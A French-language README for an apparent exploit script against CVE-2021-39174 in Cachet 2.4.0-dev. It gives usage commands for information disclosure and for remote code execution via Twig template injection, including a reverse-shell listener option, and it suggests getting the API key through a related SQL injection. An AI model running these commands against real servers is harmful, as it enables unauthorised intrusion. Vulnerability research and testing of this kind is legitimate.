
CVE-2021-39174 Cachet 2.4.0-dev
Un script Python pour CVE-2021-39174 Cachet 2.4.0-dev – divulgation d'informations et RCE via injection de template côté serveur Twig. Pour la RCE, la clé API (API KEY) de l'utilisateur est nécessaire. Consultez le lien Leave Songs ci-dessous qui explique comment obtenir la clé API via une injection SQL CVE-2021-39165.
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
Pour afficher le menu d'aide :
python3 cachet_2.4.0-dev.py -h
Tout le code fourni dans ce dépôt est destiné à des fins éducatives et de recherche uniquement. Toute action et/ou activité liée au contenu de ce dépôt relève de votre seule responsabilité. L'utilisation abusive du code de ce dépôt peut entraîner des poursuites pénales à l'encontre des personnes concernées. L'auteur ne sera pas tenu responsable en cas de poursuites pénales intentées contre des personnes qui utiliseraient le code de ce dépôt de manière illégale.